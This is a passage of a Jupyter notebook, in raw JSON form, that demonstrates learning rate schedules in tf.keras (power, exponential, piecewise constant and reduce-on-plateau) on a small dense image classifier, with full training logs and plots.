- accuracy: 0.9101 - val_loss: 0.3343 - val_accuracy: 0.8822\nEpoch 13/25\n1719/1719 [==============================] - 2s 964us/step - loss: 0.2420 - accuracy: 0.9148 - val_loss: 0.3266 - val_accuracy: 0.8890\nEpoch 14/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2373 - accuracy: 0.9144 - val_loss: 0.3299 - val_accuracy: 0.8890\nEpoch 15/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2363 - accuracy: 0.9154 - val_loss: 0.3255 - val_accuracy: 0.8874\nEpoch 16/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2309 - accuracy: 0.9181 - val_loss: 0.3217 - val_accuracy: 0.8910\nEpoch 17/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2235 - accuracy: 0.9211 - val_loss: 0.3248 - val_accuracy: 0.8914\nEpoch 18/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2247 - accuracy: 0.9194 - val_loss: 0.3202 - val_accuracy: 0.8934\nEpoch 19/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2235 - accuracy: 0.9218 - val_loss: 0.3243 - val_accuracy: 0.8906\nEpoch 20/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2227 - accuracy: 0.9225 - val_loss: 0.3224 - val_accuracy: 0.8900\nEpoch 21/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2193 - accuracy: 0.9230 - val_loss: 0.3221 - val_accuracy: 0.8912\nEpoch 22/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2163 - accuracy: 0.9227 - val_loss: 0.3195 - val_accuracy: 0.8948\nEpoch 23/25\n1719/1719 [==============================] - 2s 997us/step - loss: 0.2127 - accuracy: 0.9252 - val_loss: 0.3208 - val_accuracy: 0.8908\nEpoch 24/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2076 - accuracy: 0.9273 - val_loss: 0.3226 - val_accuracy: 0.8902\nEpoch 25/25\n1719/1719 [==============================] - 2s 999us/step - loss: 0.2104 - accuracy: 0.9250 - val_loss: 0.3225 - val_accuracy: 0.8924\n" ], [ "import 
math\n\nlearning_rate = 0.01\ndecay = 1e-4\nbatch_size = 32\nn_steps_per_epoch = math.ceil(len(X_train) / batch_size)\nepochs = np.arange(n_epochs)\nlrs = learning_rate / (1 + decay * epochs * n_steps_per_epoch)\n\nplt.plot(epochs, lrs, \"o-\")\nplt.axis([0, n_epochs - 1, 0, 0.01])\nplt.xlabel(\"Epoch\")\nplt.ylabel(\"Learning Rate\")\nplt.title(\"Power Scheduling\", fontsize=14)\nplt.grid(True)\nplt.show()", "_____no_output_____" ] ], [ [ "### Exponential Scheduling", "_____no_output_____" ], [ "```lr = lr0 * 0.1**(epoch / s)```", "_____no_output_____" ] ], [ [ "def exponential_decay_fn(epoch):\n return 0.01 * 0.1**(epoch / 20)", "_____no_output_____" ], [ "def exponential_decay(lr0, s):\n def exponential_decay_fn(epoch):\n return lr0 * 0.1**(epoch / s)\n return exponential_decay_fn\n\nexponential_decay_fn = exponential_decay(lr0=0.01, s=20)", "_____no_output_____" ], [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 25", "_____no_output_____" ], [ "lr_scheduler = keras.callbacks.LearningRateScheduler(exponential_decay_fn)\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[lr_scheduler])", "Epoch 1/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 1.1122 - accuracy: 0.7363 - val_loss: 0.8947 - val_accuracy: 0.7496\nEpoch 2/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.7354 - accuracy: 0.7825 - val_loss: 0.6059 - val_accuracy: 0.8122\nEpoch 3/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.5973 - accuracy: 0.8175 - val_loss: 0.8195 - val_accuracy: 0.7754\nEpoch 
4/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.6040 - accuracy: 0.8148 - val_loss: 0.6135 - val_accuracy: 0.8398\nEpoch 5/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.5462 - accuracy: 0.8323 - val_loss: 0.5075 - val_accuracy: 0.8490\nEpoch 6/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4479 - accuracy: 0.8555 - val_loss: 0.4538 - val_accuracy: 0.8502\nEpoch 7/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4225 - accuracy: 0.8622 - val_loss: 0.4792 - val_accuracy: 0.8524\nEpoch 8/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.3873 - accuracy: 0.8678 - val_loss: 0.5517 - val_accuracy: 0.8448\nEpoch 9/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.3635 - accuracy: 0.8767 - val_loss: 0.5312 - val_accuracy: 0.8600\nEpoch 10/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.3353 - accuracy: 0.8840 - val_loss: 0.4671 - val_accuracy: 0.8660\nEpoch 11/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.3108 - accuracy: 0.8927 - val_loss: 0.4885 - val_accuracy: 0.8670\nEpoch 12/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2895 - accuracy: 0.8987 - val_loss: 0.4698 - val_accuracy: 0.8636\nEpoch 13/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2660 - accuracy: 0.9071 - val_loss: 0.4558 - val_accuracy: 0.8820\nEpoch 14/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2442 - accuracy: 0.9153 - val_loss: 0.4325 - val_accuracy: 0.8774\nEpoch 15/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2375 - accuracy: 0.9177 - val_loss: 0.4703 - val_accuracy: 0.8800\nEpoch 16/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2196 - accuracy: 0.9231 - val_loss: 0.4657 - val_accuracy: 0.8870\nEpoch 17/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2013 - accuracy: 
0.9312 - val_loss: 0.5023 - val_accuracy: 0.8760\nEpoch 18/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1938 - accuracy: 0.9331 - val_loss: 0.4782 - val_accuracy: 0.8856\nEpoch 19/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1774 - accuracy: 0.9394 - val_loss: 0.4815 - val_accuracy: 0.8898\nEpoch 20/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1703 - accuracy: 0.9418 - val_loss: 0.4674 - val_accuracy: 0.8902\nEpoch 21/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.1611 - accuracy: 0.9462 - val_loss: 0.5116 - val_accuracy: 0.8930\nEpoch 22/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1530 - accuracy: 0.9481 - val_loss: 0.5326 - val_accuracy: 0.8934\nEpoch 23/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.1436 - accuracy: 0.9519 - val_loss: 0.5297 - val_accuracy: 0.8902\nEpoch 24/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1326 - accuracy: 0.9560 - val_loss: 0.5526 - val_accuracy: 0.8930\nEpoch 25/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1308 - accuracy: 0.9560 - val_loss: 0.5699 - val_accuracy: 0.8928\n" ], [ "plt.plot(history.epoch, history.history[\"lr\"], \"o-\")\nplt.axis([0, n_epochs - 1, 0, 0.011])\nplt.xlabel(\"Epoch\")\nplt.ylabel(\"Learning Rate\")\nplt.title(\"Exponential Scheduling\", fontsize=14)\nplt.grid(True)\nplt.show()", "_____no_output_____" ] ], [ [ "The schedule function can take the current learning rate as a second argument:", "_____no_output_____" ] ], [ [ "def exponential_decay_fn(epoch, lr):\n return lr * 0.1**(1 / 20)", "_____no_output_____" ] ], [ [ "If you want to update the learning rate at each iteration rather than at each epoch, you must write your own callback class:", "_____no_output_____" ] ], [ [ "K = keras.backend\n\nclass ExponentialDecay(keras.callbacks.Callback):\n def __init__(self, s=40000):\n super().__init__()\n 
self.s = s\n\n def on_batch_begin(self, batch, logs=None):\n # Note: the `batch` argument is reset at each epoch\n lr = K.get_value(self.model.optimizer.learning_rate)\n K.set_value(self.model.optimizer.learning_rate, lr * 0.1**(1 / s))\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n logs['lr'] = K.get_value(self.model.optimizer.learning_rate)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nlr0 = 0.01\noptimizer = keras.optimizers.Nadam(learning_rate=lr0)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])\nn_epochs = 25\n\ns = 20 * len(X_train) // 32 # number of steps in 20 epochs (batch size = 32)\nexp_decay = ExponentialDecay(s)\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[exp_decay])", "Epoch 1/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 1.1153 - accuracy: 0.7390 - val_loss: 0.9588 - val_accuracy: 0.7338\nEpoch 2/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.6929 - accuracy: 0.7934 - val_loss: 0.5328 - val_accuracy: 0.8318\nEpoch 3/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.6317 - accuracy: 0.8097 - val_loss: 0.7656 - val_accuracy: 0.8278\nEpoch 4/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.5827 - accuracy: 0.8258 - val_loss: 0.5585 - val_accuracy: 0.8382\nEpoch 5/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.5041 - accuracy: 0.8407 - val_loss: 0.5367 - val_accuracy: 0.8574\nEpoch 6/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.4595 - accuracy: 0.8588 - val_loss: 0.6000 - val_accuracy: 0.8516\nEpoch 
7/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4490 - accuracy: 0.8644 - val_loss: 0.4605 - val_accuracy: 0.8648\nEpoch 8/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.3925 - accuracy: 0.8783 - val_loss: 0.5076 - val_accuracy: 0.8616\nEpoch 9/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4085 - accuracy: 0.8797 - val_loss: 0.4577 - val_accuracy: 0.8650\nEpoch 10/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.3440 - accuracy: 0.8927 - val_loss: 0.5309 - val_accuracy: 0.8762\nEpoch 11/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.3267 - accuracy: 0.8948 - val_loss: 0.4652 - val_accuracy: 0.8792\nEpoch 12/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.3046 - accuracy: 0.9033 - val_loss: 0.4863 - val_accuracy: 0.8692\nEpoch 13/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2811 - accuracy: 0.9087 - val_loss: 0.4726 - val_accuracy: 0.8770\nEpoch 14/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2684 - accuracy: 0.9145 - val_loss: 0.4526 - val_accuracy: 0.8760\nEpoch 15/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2478 - accuracy: 0.9209 - val_loss: 0.4926 - val_accuracy: 0.8838\nEpoch 16/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2315 - accuracy: 0.9253 - val_loss: 0.4686 - val_accuracy: 0.8840\nEpoch 17/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2164 - accuracy: 0.9318 - val_loss: 0.4845 - val_accuracy: 0.8858\nEpoch 18/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.2093 - accuracy: 0.9346 - val_loss: 0.4923 - val_accuracy: 0.8834\nEpoch 19/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.1929 - accuracy: 0.9396 - val_loss: 0.4779 - val_accuracy: 0.8880\nEpoch 20/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.1852 - accuracy: 
0.9439 - val_loss: 0.4886 - val_accuracy: 0.8868\nEpoch 21/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.1740 - accuracy: 0.9470 - val_loss: 0.5097 - val_accuracy: 0.8852\nEpoch 22/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.1668 - accuracy: 0.9474 - val_loss: 0.5161 - val_accuracy: 0.8898\nEpoch 23/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1571 - accuracy: 0.9530 - val_loss: 0.5381 - val_accuracy: 0.8886\nEpoch 24/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1444 - accuracy: 0.9575 - val_loss: 0.5415 - val_accuracy: 0.8910\nEpoch 25/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.1447 - accuracy: 0.9569 - val_loss: 0.5833 - val_accuracy: 0.8880\n" ], [ "n_steps = n_epochs * len(X_train) // 32\nsteps = np.arange(n_steps)\nlrs = lr0 * 0.1**(steps / s)", "_____no_output_____" ], [ "plt.plot(steps, lrs, \"-\", linewidth=2)\nplt.axis([0, n_steps - 1, 0, lr0 * 1.1])\nplt.xlabel(\"Batch\")\nplt.ylabel(\"Learning Rate\")\nplt.title(\"Exponential Scheduling (per batch)\", fontsize=14)\nplt.grid(True)\nplt.show()", "_____no_output_____" ] ], [ [ "### Piecewise Constant Scheduling", "_____no_output_____" ] ], [ [ "def piecewise_constant_fn(epoch):\n if epoch < 5:\n return 0.01\n elif epoch < 15:\n return 0.005\n else:\n return 0.001", "_____no_output_____" ], [ "def piecewise_constant(boundaries, values):\n boundaries = np.array([0] + boundaries)\n values = np.array(values)\n def piecewise_constant_fn(epoch):\n return values[np.argmax(boundaries > epoch) - 1]\n return piecewise_constant_fn\n\npiecewise_constant_fn = piecewise_constant([5, 15], [0.01, 0.005, 0.001])", "_____no_output_____" ], [ "lr_scheduler = keras.callbacks.LearningRateScheduler(piecewise_constant_fn)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n 
keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 25\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[lr_scheduler])", "Epoch 1/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 1.1511 - accuracy: 0.7326 - val_loss: 0.8456 - val_accuracy: 0.7410\nEpoch 2/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.7371 - accuracy: 0.7786 - val_loss: 0.6796 - val_accuracy: 0.8092\nEpoch 3/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.8055 - accuracy: 0.7700 - val_loss: 1.7429 - val_accuracy: 0.4514\nEpoch 4/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 1.0351 - accuracy: 0.6826 - val_loss: 0.9870 - val_accuracy: 0.6928\nEpoch 5/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.9185 - accuracy: 0.7098 - val_loss: 0.8727 - val_accuracy: 0.6932\nEpoch 6/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.6905 - accuracy: 0.7481 - val_loss: 0.6694 - val_accuracy: 0.7696\nEpoch 7/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.6115 - accuracy: 0.7713 - val_loss: 0.6956 - val_accuracy: 0.7306\nEpoch 8/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.5791 - accuracy: 0.7793 - val_loss: 0.6659 - val_accuracy: 0.7738\nEpoch 9/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.5622 - accuracy: 0.7881 - val_loss: 0.7363 - val_accuracy: 0.7850\nEpoch 10/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.5253 - accuracy: 0.8470 - val_loss: 0.5484 - val_accuracy: 0.8578\nEpoch 11/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4401 - accuracy: 0.8694 - val_loss: 0.6724 - val_accuracy: 
0.8602\nEpoch 12/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.4334 - accuracy: 0.8732 - val_loss: 0.5551 - val_accuracy: 0.8504\nEpoch 13/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.4179 - accuracy: 0.8771 - val_loss: 0.6685 - val_accuracy: 0.8554\nEpoch 14/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.4300 - accuracy: 0.8775 - val_loss: 0.5340 - val_accuracy: 0.8584\nEpoch 15/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4069 - accuracy: 0.8777 - val_loss: 0.6519 - val_accuracy: 0.8478\nEpoch 16/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.3349 - accuracy: 0.8953 - val_loss: 0.4801 - val_accuracy: 0.8778\nEpoch 17/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.2695 - accuracy: 0.9109 - val_loss: 0.4880 - val_accuracy: 0.8786\nEpoch 18/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2568 - accuracy: 0.9136 - val_loss: 0.4726 - val_accuracy: 0.8822\nEpoch 19/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2436 - accuracy: 0.9203 - val_loss: 0.4792 - val_accuracy: 0.8842\nEpoch 20/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.2421 - accuracy: 0.9212 - val_loss: 0.5088 - val_accuracy: 0.8838\nEpoch 21/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.2288 - accuracy: 0.9246 - val_loss: 0.5083 - val_accuracy: 0.8830\nEpoch 22/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2215 - accuracy: 0.9270 - val_loss: 0.5217 - val_accuracy: 0.8846\nEpoch 23/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2106 - accuracy: 0.9297 - val_loss: 0.5297 - val_accuracy: 0.8834\nEpoch 24/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2002 - accuracy: 0.9334 - val_loss: 0.5597 - val_accuracy: 0.8864\nEpoch 25/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 
0.2005 - accuracy: 0.9350 - val_loss: 0.5533 - val_accuracy: 0.8868\n" ], [ "plt.plot(history.epoch, [piecewise_constant_fn(epoch) for epoch in history.epoch], \"o-\")\nplt.axis([0, n_epochs - 1, 0, 0.011])\nplt.xlabel(\"Epoch\")\nplt.ylabel(\"Learning Rate\")\nplt.title(\"Piecewise Constant Scheduling\", fontsize=14)\nplt.grid(True)\nplt.show()", "_____no_output_____" ] ], [ [ "### Performance Scheduling", "_____no_output_____" ] ], [ [ "tf.random.set_seed(42)\nnp.random.seed(42)", "_____no_output_____" ], [ "lr_scheduler = keras.callbacks.ReduceLROnPlateau(factor=0.5, patience=5)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\noptimizer = keras.optimizers.SGD(learning_rate=0.02, momentum=0.9)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])\nn_epochs = 25\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[lr_scheduler])", "Epoch 1/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.7116 - accuracy: 0.7769 - val_loss: 0.4869 - val_accuracy: 0.8478\nEpoch 2/25\n1719/1719 [==============================] - 2s 947us/step - loss: 0.4912 - accuracy: 0.8390 - val_loss: 0.5958 - val_accuracy: 0.8270\nEpoch 3/25\n1719/1719 [==============================] - 2s 987us/step - loss: 0.5222 - accuracy: 0.8379 - val_loss: 0.4869 - val_accuracy: 0.8584\nEpoch 4/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5061 - accuracy: 0.8467 - val_loss: 0.4588 - val_accuracy: 0.8548\nEpoch 5/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5216 - accuracy: 0.8469 - val_loss: 0.6096 - val_accuracy: 0.8300\nEpoch 6/25\n1719/1719 
[==============================] - 2s 1ms/step - loss: 0.4984 - accuracy: 0.8546 - val_loss: 0.5359 - val_accuracy: 0.8498\nEpoch 7/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5104 - accuracy: 0.8579 - val_loss: 0.5457 - val_accuracy: 0.8522\nEpoch 8/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5375 - accuracy: 0.8538 - val_loss: 0.6445 - val_accuracy: 0.8218\nEpoch 9/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5333 - accuracy: 0.8522 - val_loss: 0.5472 - val_accuracy: 0.8560\nEpoch 10/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3280 - accuracy: 0.8902 - val_loss: 0.3826 - val_accuracy: 0.8876\nEpoch 11/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2410 - accuracy: 0.9135 - val_loss: 0.4025 - val_accuracy: 0.8876\nEpoch 12/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2266 - accuracy: 0.9180 - val_loss: 0.4540 - val_accuracy: 0.8694\nEpoch 13/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2129 - accuracy: 0.9221 - val_loss: 0.4310 - val_accuracy: 0.8866\nEpoch 14/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1959 - accuracy: 0.9270 - val_loss: 0.4406 - val_accuracy: 0.8814\nEpoch 15/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1975 - accuracy: 0.9277 - val_loss: 0.4341 - val_accuracy: 0.8840\nEpoch 16/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1409 - accuracy: 0.9464 - val_loss: 0.4220 - val_accuracy: 0.8932\nEpoch 17/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1181 - accuracy: 0.9542 - val_loss: 0.4409 - val_accuracy: 0.8948\nEpoch 18/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1124 - accuracy: 0.9560 - val_loss: 0.4480 - val_accuracy: 0.8898\nEpoch 19/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1070 - accuracy: 0.9579 - 
val_loss: 0.4610 - val_accuracy: 0.8932\nEpoch 20/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1016 - accuracy: 0.9606 - val_loss: 0.4845 - val_accuracy: 0.8918\nEpoch 21/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.0848 - accuracy: 0.9686 - val_loss: 0.4829 - val_accuracy: 0.8934\nEpoch 22/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.0792 - accuracy: 0.9700 - val_loss: 0.4906 - val_accuracy: 0.8952\nEpoch 23/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.0751 - accuracy: 0.9720 - val_loss: 0.4951 - val_accuracy: 0.8950\nEpoch 24/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.0687 - accuracy: 0.9739 - val_loss: 0.5109 - val_accuracy: 0.8948\nEpoch 25/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.0683 - accuracy: 0.9752 - val_loss: 0.5241 - val_accuracy: 0.8936\n" ], [ "plt.plot(history.epoch, history.history[\"lr\"], \"bo-\")\nplt.xlabel(\"Epoch\")\nplt.ylabel(\"Learning Rate\", color='b')\nplt.tick_params('y', colors='b')\nplt.gca().set_xlim(0, n_epochs - 1)\nplt.grid(True)\n\nax2 = plt.gca().twinx()\nax2.plot(history.epoch, history.history[\"val_loss\"], \"r^-\")\nax2.set_ylabel('Validation Loss', color='r')\nax2.tick_params('y', colors='r')\n\nplt.title(\"Reduce LR on Plateau\", fontsize=14)\nplt.show()", "_____no_output_____" ] ], [ [ "### tf.keras schedulers", "_____no_output_____" ] ], [ [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\ns = 20 * len(X_train) // 32 # number of steps in 20 epochs (batch size = 32)\nlearning_rate = keras.optimizers.schedules.ExponentialDecay(0.01, s, 0.1)\noptimizer = 
keras.optimizers.SGD(learning_rate)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])\nn_epochs = 25\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5995 - accuracy: 0.7923 - val_loss: 0.4095 - val_accuracy: 0.8606\nEpoch 2/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3890 - accuracy: 0.8613 - val_loss: 0.3738 - val_accuracy: 0.8692\nEpoch 3/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3530 - accuracy: 0.8772 - val_loss: 0.3735 - val_accuracy: 0.8692\nEpoch 4/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3296 - accuracy: 0.8813 - val_loss: 0.3494 - val_accuracy: 0.8798\nEpoch 5/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3178 - accuracy: 0.8867 - val_loss: 0.3430 - val_accuracy: 0.8794\nEpoch 6/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2930 - accuracy: 0.8951 - val_loss: 0.3414 - val_accuracy: 0.8826\nEpoch 7/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2854 - accuracy: 0.8985 - val_loss: 0.3354 - val_accuracy: 0.8810\nEpoch 8/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2714 - accuracy: 0.9039 - val_loss: 0.3364 - val_accuracy: 0.8824\nEpoch 9/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2714 - accuracy: 0.9047 - val_loss: 0.3265 - val_accuracy: 0.8846\nEpoch 10/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2570 - accuracy: 0.9084 - val_loss: 0.3238 - val_accuracy: 0.8854\nEpoch 11/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2502 - accuracy: 0.9117 - val_loss: 0.3250 - val_accuracy: 0.8862\nEpoch 12/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2453 - accuracy: 0.9145 - val_loss: 0.3299 - 
val_accuracy: 0.8830\nEpoch 13/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2408 - accuracy: 0.9154 - val_loss: 0.3219 - val_accuracy: 0.8870\nEpoch 14/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2380 - accuracy: 0.9154 - val_loss: 0.3221 - val_accuracy: 0.8860\nEpoch 15/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2378 - accuracy: 0.9166 - val_loss: 0.3208 - val_accuracy: 0.8864\nEpoch 16/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2318 - accuracy: 0.9191 - val_loss: 0.3184 - val_accuracy: 0.8892\nEpoch 17/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2266 - accuracy: 0.9212 - val_loss: 0.3197 - val_accuracy: 0.8906\nEpoch 18/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2284 - accuracy: 0.9185 - val_loss: 0.3169 - val_accuracy: 0.8906\nEpoch 19/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2286 - accuracy: 0.9205 - val_loss: 0.3197 - val_accuracy: 0.8884\nEpoch 20/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2288 - accuracy: 0.9211 - val_loss: 0.3169 - val_accuracy: 0.8906\nEpoch 21/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2265 - accuracy: 0.9212 - val_loss: 0.3179 - val_accuracy: 0.8904\nEpoch 22/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2258 - accuracy: 0.9205 - val_loss: 0.3163 - val_accuracy: 0.8914\nEpoch 23/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2224 - accuracy: 0.9226 - val_loss: 0.3170 - val_accuracy: 0.8904\nEpoch 24/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2182 - accuracy: 0.9244 - val_loss: 0.3165 - val_accuracy: 0.8898\nEpoch 25/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2224 - accuracy: 0.9229 - val_loss: 0.3164 - val_accuracy: 